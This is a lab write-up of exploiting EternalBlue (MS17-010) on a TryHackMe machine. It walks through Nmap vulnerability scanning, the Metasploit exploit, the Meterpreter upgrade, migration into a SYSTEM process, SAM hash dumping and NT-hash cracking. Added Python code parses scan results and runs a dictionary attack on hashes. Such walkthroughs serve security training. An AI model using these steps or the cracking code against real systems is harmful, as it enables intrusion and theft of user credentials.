Learn how to exploit an operating-system-level vulnerability and gain SYSTEM-level access on the target machine in this technical write-up of EternalBlue.
Exploiting System Level Vulnerability
Operating system vulnerabilities are common, especially in Microsoft Windows, and they can be exploited in different ways to give an adversary system-level access to the host. One such vulnerability is discussed in this article. As a proof of concept, I will exploit a very well-known Windows SMBv1 vulnerability called EternalBlue (MS17-010). The machine I am going to exploit is available on the TryHackMe platform. So, without further ado, let's start!
Exploiting a very popular Microsoft Windows Vulnerability to gain system-level access and escalate privileges.
Exploiting the host machine under consideration will show the reader how to:
- gain a shell on the compromised system in several ways;
- migrate into a higher-privileged process;
- dump and crack password hashes to gain access to other user accounts on the compromised system, and use that access to collect the flags planted on it.
1. Reconnaissance Phase
Let us first gather information about the target. The most common tool for discovering open ports and the services behind them is Nmap, so we scan the host with Nmap using the flags shown below.
We get the list of open ports and the services listening on them, which answers task 2. This information helps in identifying service-level vulnerabilities. Notice that we also included the vuln NSE script category, which makes Nmap act as a vulnerability scanner and report what it finds. In our case it finds MS17-010, better known as EternalBlue, which the scan marks with a risk level of critical, so that is what we are going to exploit. This gives us the answer to task 3.
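The scan above is read off a screenshot; when scanning more than one host it is easier to save the Nmap run with -oX and let a script pull out the open ports and any script that reported VULNERABLE. The following is an added example written for this write-up, not part of the original post or of Nmap; the XML sample is constructed and trimmed to the elements the parser reads, and the host addresses and script output in it are assumptions, not real scan results.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap -sV --script vuln -oX output (trimmed). The two
# hosts, their addresses and the script verdicts are assumptions for this
# example, not real scan results.
SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="10.10.10.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.10.10.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="state">NOT VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""


def parse_scan(xml_text):
    """Return, per host, the open ports and every NSE script verdict found."""
    root = ET.fromstring(xml_text.strip())
    results = []
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        open_ports = []
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            service = port.find("service")
            name = service.get("name") if service is not None else ""
            open_ports.append((int(port.get("portid")), name))
        # NSE results sit under <hostscript> (host scripts such as smb-vuln-*)
        # or under a <port>; the vulns library writes the verdict as
        # <elem key="state">.
        findings = []
        for script in host.iter("script"):
            for elem in script.iter("elem"):
                if elem.get("key") == "state" and elem.text:
                    findings.append((script.get("id"), elem.text.strip()))
        results.append({"host": addr, "open_ports": open_ports, "findings": findings})
    return results


def is_vulnerable_state(state):
    """'VULNERABLE', 'LIKELY VULNERABLE', 'VULNERABLE (Exploitable)' count;
    'NOT VULNERABLE' and 'UNKNOWN' do not."""
    s = state.upper()
    return "VULNERABLE" in s and not s.startswith("NOT")


def vulnerable_hosts(xml_text, script_id="smb-vuln-ms17-010"):
    """Hosts that expose SMB (445/tcp) and where the named script fired."""
    hits = []
    for r in parse_scan(xml_text):
        has_smb = any(port == 445 for port, _ in r["open_ports"])
        flagged = any(sid == script_id and is_vulnerable_state(st)
                      for sid, st in r["findings"])
        if has_smb and flagged:
            hits.append(r["host"])
    return hits


if __name__ == "__main__":
    for r in parse_scan(SAMPLE_NMAP_XML):
        print(r["host"], r["open_ports"], r["findings"])
    print("MS17-010 candidates:", vulnerable_hosts(SAMPLE_NMAP_XML))
```

The 445/tcp check is deliberate: a smb-vuln-* verdict without a reachable SMB port is usually a stale or mis-attributed result, and the EternalBlue module needs that port anyway.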
2. Gaining Access
Now that we know the vulnerability, it is time to exploit it. For exploitation we use Metasploit, which ships a large library of exploit and post-exploitation modules that can be run against target systems. Fire up Metasploit by typing msfconsole in the terminal and search for the module that corresponds to EternalBlue (MS17-010); the one we want is exploit/windows/smb/ms17_010_eternalblue.
Now that we know which exploit to use, let's run it. Type show options to see which parameters are required as prerequisites, as seen below. At a minimum RHOSTS must point at the target; once the exploit and its parameters are set, run it as shown below.
After running the exploit we see that we have gained a shell on the target machine.
This gives us all the answers for the Gaining Access phase.
3. Escalate (POST Exploitation)
Getting a shell is not enough: we have to escalate our privileges to perform administrator-level operations on the system. First we upgrade our shell to Meterpreter, which offers far more functionality than a plain shell. For this we search Metasploit's post-exploitation modules.
The search returns the post module that converts a shell session into Meterpreter, post/multi/manage/shell_to_meterpreter. This answers task 1 for this section. Background the shell, list the active sessions with sessions -l, and tell the module which one to upgrade with set SESSION <id>. This answers task 2 for this section. You also need to set the local host, so type set LHOST <your IP address>. Once all parameters are set, run the post module.
Now that we have a Meterpreter session we can check what we are running as: getuid prints the current user, and getsystem attempts to obtain NT AUTHORITY\SYSTEM (or confirms that we already hold it).
Run the ps command to list all processes running on the system and note the PID (not the PPID) of a process whose user is NT AUTHORITY\SYSTEM. There are a lot of processes running as SYSTEM, so I noted down spoolsv.exe. Prefer a long-lived service process: if the process you move into exits, your session dies with it.
Now migrate to that PID with migrate <PID> so that our session lives inside the higher-privileged process. This answers all the task questions in this section.
4. Cracking
Now that we have full access as NT AUTHORITY\SYSTEM via migration into the higher-privileged process, it is time to crack some passwords so we can log in with a user's own credentials. Use hashdump to dump all the hashes from the SAM database. Each line has the form user:RID:LM hash:NT hash:::, and the account with a RID of 1000 or higher (built-in accounts such as Administrator and Guest use RIDs below 1000) is the non-default user (task 1).
Now we need to crack the non-default user's NT hash to recover the password. For this I used the online utility CrackStation, which looks hashes up in precomputed tables. Because an NT hash is just the unsalted MD4 of the UTF-16LE password, an offline wordlist attack with hashcat or John the Ripper works equally well and keeps the hash off third-party servers.
This answers task 2 for this section.
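To show what CrackStation is doing for us, here is the whole cracking step in code: parse hashdump output, single out the non-default account by RID, and run a wordlist against the NT hashes. This is an added example written for this write-up, not part of the original post or of Metasploit. The hashdump lines and the wordlist are constructed (the usernames and the all-f hash are made up); MD4 is implemented inline because hashlib's md4 is frequently unavailable under OpenSSL 3. The NT hashes of "password" and of the empty password are the well-known values.

```python
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data):
    """Pure-Python MD4 (RFC 1320). Three rounds of 16 operations per 64-byte block."""
    msg = bytearray(data)
    bit_len = 8 * len(data)
    msg.append(0x80)                      # padding: 1 bit, then zeros to 56 mod 64
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)     # then the message length in bits, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r2_order = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):               # round 1: F(b,c,d) = (b AND c) OR (NOT b AND d)
            a = _rotl((a + ((b & c) | (~b & d)) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):               # round 2: G = majority, constant 0x5A827999
            a = _rotl((a + ((b & c) | (b & d) | (c & d)) + x[r2_order[i]] + 0x5A827999) & MASK32,
                      (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):               # round 3: H = xor, constant 0x6ED9EBA1
            a = _rotl((a + (b ^ c ^ d) + x[r3_order[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & MASK32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)). No salt, so one hash per candidate covers every user."""
    return md4(password.encode("utf-16le")).hex()


# Constructed hashdump output. 'labuser' and 'svc_backup' are made-up names;
# the aad3b4... LM field is the standard 'no LM hash stored' placeholder.
SAMPLE_HASHDUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
labuser:1000:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:ffffffffffffffffffffffffffffffff:::
"""

# Constructed mini wordlist; the empty string catches accounts with a blank password.
SAMPLE_WORDLIST = ["", "123456", "password", "letmein", "qwerty"]


def parse_hashdump(text):
    """Parse lines of the form user:RID:LM:NT::: as printed by meterpreter's hashdump."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        user, rid, lm, nt = line.split(":")[:4]
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries


def non_default_users(entries):
    """Locally created accounts get RIDs from 1000 upward; 500, 501 and other
    sub-1000 RIDs are built-in accounts."""
    return [e["user"] for e in entries if e["rid"] >= 1000]


def crack(entries, wordlist):
    """Dictionary attack: hash each candidate once, then match every NT hash against the table."""
    table = {}
    for word in wordlist:
        table.setdefault(nt_hash(word), word)
    return {e["user"]: table[e["nt"]] for e in entries if e["nt"] in table}


if __name__ == "__main__":
    entries = parse_hashdump(SAMPLE_HASHDUMP)
    print("non-default users:", non_default_users(entries))
    print("cracked:", crack(entries, SAMPLE_WORDLIST))
```

Two things the output makes visible that a lookup site hides: an NT hash of 31d6cfe0d16ae931b73c59d7e0c089c0 means the account has an empty password, and any hash that stays uncracked (svc_backup here) is simply one your wordlist did not contain, not evidence of a strong password.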
5. Find Flags
Now that all the tasks of the previous sections are done, it is time to find the flags: hidden checkpoints scattered across the system. Let's follow the hints and try to find them. Following the hint, I was able to find the first flag.
To find the second flag, look for the folder that Windows uses to store its password database; you can find its location with a quick web search. Navigate to that folder and there you will find flag2.
To find the last flag you have to be a bit smarter. What I did was search the filesystem for file names starting with flag (Meterpreter's search -f flag*.txt does this); from the results I navigated to that particular folder and got my last flag. If you are unable to access the directory as shown below, escape each backslash in the directory and file name by doubling it (\\), which resolves the access problem.
The EternalBlue vulnerability became infamous and many systems were compromised through it. Microsoft released fixes for the affected operating systems in the MS17-010 security update. The takeaway is that a single unpatched system-level vulnerability hands an adversary full control of the machine, to use in any way they please. It is therefore recommended to always keep your software and Windows installations updated with the latest versions, fixes and patches to reduce the risk of being compromised by such vulnerabilities.
I am a cybersecurity enthusiast pursuing my Master’s in Information Security and trying to get into a full-time cybersecurity career.